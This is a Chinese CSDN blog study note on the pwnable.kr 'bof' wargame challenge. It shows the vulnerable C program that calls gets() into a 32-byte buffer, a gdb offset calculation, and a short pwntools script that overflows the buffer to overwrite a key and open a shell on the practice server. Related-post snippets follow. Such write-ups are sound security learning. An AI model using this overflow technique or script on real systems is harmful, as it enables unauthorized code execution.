pwnable学习笔记-bof

最新推荐文章于 2024-06-03 14:47:05 发布
最新推荐文章于 2024-06-03 14:47:05 发布
阅读量326 收藏 1
点赞数
分类专栏: # PWN 文章标签: 安全 安全漏洞 网络安全 pwn 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122057558
版权

文章目录

概述

继续pwn学习,靶场为http://pwnable.kr/,今天为该系列第3篇bof
在这里插入图片描述

题目

题目概述

题目提示缓冲区溢出,是常见的软件漏洞。
在这里插入图片描述

文件与源码下载

  • http://pwnable.kr/bin/bof
  • http://pwnable.kr/bin/bof.c

连接方式

nc pwnable.kr 9000

源代码分析

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
 char overflowme[32];
 printf("overflow me : ");
 gets(overflowme);    // smash me!
 if(key == 0xcafebabe){
  system("/bin/sh");
 }
 else{
  printf("Nah..\n");
 }
}
int main(int argc, char* argv[]){
 func(0xdeadbeef);
 return 0;
}

思路

这段代码中有函数func()和主函数main()main()中调用了func()func()接收main()传递的值0xdeadbeef,并与0xcafebabe比较,如果相等能得到shell。

func()中定义了一个32byte的字符串,并使用gets()函数接收,但没有检查边界,如果用户输入超过32bytes,会发生溢出。

gdb分析

pwndbg> start
pwndbg> pdisass &func 12

可以看到比较的过程,传入的参数在ebp+8,而用户输入缓冲区的数据在ebp-0x2c
在这里插入图片描述

因此,二者的距离为0x34

In [1]: hex(0x8--0x2C)
Out[1]: '0x34'

解答

使用Python第三方库pwntools编写利用脚本

# coding: utf-8

from pwn import *

context.log_level = 'debug'

r = remote("pwnable.kr", 9000)
r.sendline("A" * 0x34 + p32(0xcafebabe))
r.interactive()
galaxy3000
关注
专栏目录
CS-Situational-Awareness-BOF:使用信标对象文件实现的情境意识命令
02-05
CS-Situational-Awareness-BOF:使用信标对象文件实现的情境意识命令
CobaltStrike逆向学习系列(15):CS功能分析-BOF
SecSource_Stars的博客
02-22 808
这是[信安成长计划]的第 15 篇文章 0x00 目录 0x01 BOF功能分析 0x02 BOF功能执行 0x03 写在最后 其实在看过 RDI 与 DotNet 功能执行之后,BOF 的执行基本就不用再说了,唯一需要提及的可能就是它所包含的技术,而且相关的文章和代码也都很丰富了 0x01 BOF功能分析 在 CS 中,有相当一部分功能都是 BOF 形式的,我们随意选择一个 它继承了 PostExInlineObject 类,需要自己实现的并不多,但实际上,一些函数还是自己实现的好 在实际调用的时候,
pwnablebof
qq_43430261的博客
10-18 386
看代码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafeb...
pwnablebof
qq_51979295的博客
09-26 223
栈溢出,给我狠狠地溢出!
pwnable-bof
最新发布
wzbzdm的博客
06-03 889
可以看到overflowme的起始地址为0xfffd2e0 + 0xc = 0xfffd2ec。与前面的overflowme位置的差值为0x34即52个字符的长度。那我们需要填充 52个字符串 + 一个int就能成功。可以看出key的地址为 0xfffd320。查看当前目录下的文件,获得flag。连接远程主机并发送payload。通过exit结束调试。
pwnable- bof
just do IT
06-20 227
查看程序源码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xca...
pwnable.kr之bof
river
05-01 4419
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
CVE-2020-0796-BOF
03-09
CVE-2020-0796-BOF
CobaltStrike-BOF:信标BOF集合,用于学习窗户和钴击
03-20
2)WMI横向移动-Win32_Process创建与上一个概念相似,但有趣的学习经验。 采纳的代码 。此方法使用Win32_Process类。 3)WMI横向移动-事件订阅这使用WMI事件进行横向移动。大部分繁重的工作都是由完成的 4)按需C2...
OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练
05-04
触发BoF(这对OSCP有利,因为它们为您提供了代码段) 查找EIP偏移 确认偏移 找到坏蛋 确认错误字符+查找JMP ESP指令 确认代码执行(pop calc) 利用主机 它基于“”项目(顺便说一句,对此进行了令人敬畏的解释)...
extps-cobalt-strike-bof:扩展流程列表(搜索功能)
05-26
编译 make用法以下命令随附的Aggressor脚本:extps extps proc /用户extps proc用户例如:extps explorer snoom 例如:extps snoom 例如:extps onedrive管理员注意:BOF仅用于64位。例子 beacon> extps explorer[*]...
pwnable.kr --- bof题解
Yannie's Blog
12-11 1110
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;string.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; void func(int key) { char overflowme[32]; printf(&
bof - pwnable
SkYe's Blog
08-19 443
bof - pwnable 1.获取题目 题目给出下载链接:程序文件;源码 2. 运行程序、查看文件类型、保护措施 在本地机上运行一下程序:运行提示需要输入一个passcode,随意输入一个密码提示Nah… 查看文件类型:是32位动态链接的elf 查看保护措施: 3.分析源码 因为题目有给出源码,所以先直接查看源码分析。 #include <stdio.h> #include &...
pwnable 笔记 Toddler's Bottle - bof
HiTaQini
11-16 1927
缓存区溢出
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1770
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
pwnable.kr bof
潜心学习
07-04 1175
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。 bof.c #include&nbsp;&lt;stdio.h&gt; #include&nbsp;&lt;string.h&gt; #include&nbsp;&lt;stdlib.h&gt; void&nbsp;func(int&nbsp;key)...
pwnable.kr】bof
think_ycx的专栏
07-08 519
下载程序wget http://pwnable.kr/bin/bof wget http://pwnable.kr/bin/bof.c程序调用gets获取字符串s [ebp-2Ch]和传入的参数a1 [ebp+8] 比较,stack overflow padding:0x2C + 0x8。IDA pseudocodeunsigned int __cdecl func(int a1) { cha...
pwnable.kr-----解题过程】bof
lyuchen65的博客
09-16 2413
#include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); if(key == 0xcafebabe){ system("/bin/sh"); } else {
pwn学习pwnable.kr bof
Richard_pl的博客
03-12 472
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
哈希图像检索学习笔记
07-29
哈希图像检索是一种用于在大规模图像数据库中快速搜索相似图像的方法。在哈希图像检索中,图像被转换为哈希码,然后通过比较哈希码的相似性来确定图像之间的相似度。有几种常用的哈希算法可以用于图像检索,如SIFT、SURF、ORB等特征提取算法\[1\]。此外,还有一些基于哈希的图像检索方法,如VLAD、BOF等,可以用于处理海量数据的图像检索\[1\]。 在哈希图像检索中,可以使用不同的方法来计算图像之间的相似度。一种常用的方法是通过比较图像的颜色、纹理和局部特征来计算相似度\[2\]。另外,还可以使用KD-Tree、局部敏感哈希(LSH)和原子哈希函数等方法来在高维空间中进行图像检索\[2\]。 此外,还有一种基于监督学习和核的Hash算法,称为KSH算法。KSH算法利用核主要是为了解决线性不可分问题,通过监督学习学习到更有区分度的哈希值,从而降低特征维数\[3\]。 总之,哈希图像检索是一种用于在大规模图像数据库中快速搜索相似图像的方法,它可以通过提取图像特征和计算相似度来实现。不同的哈希算法和方法可以用于不同的图像检索任务。 #### 引用[.reference_title] - *1* *3* [图像检索传统算法学习笔记](https://blog.csdn.net/qq_39858278/article/details/83895342)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [8月23日计算机视觉理论学习笔记——图像检索](https://blog.csdn.net/Ashen_0nee/article/details/126467437)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值